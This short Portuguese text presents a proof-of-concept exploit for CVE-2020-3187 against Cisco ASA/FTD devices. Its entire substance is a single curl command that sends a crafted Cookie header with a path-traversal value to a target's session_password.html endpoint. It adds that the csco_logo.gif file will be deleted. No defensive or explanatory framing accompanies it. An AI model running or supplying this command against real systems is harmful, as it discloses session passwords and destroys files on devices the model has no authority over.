
Prova de conceito de exploit para CVE-2020-3187 visando a divulgação de senha de sessão em Cisco ASA/FTD por meio de cabeçalho de cookie HTTP manipulado.
curl -H "Cookie: token=. ./+CSOU+/csco_logo.gif" https://target.com/+CSCOE+/session_password.html
(o logo.gif será excluído)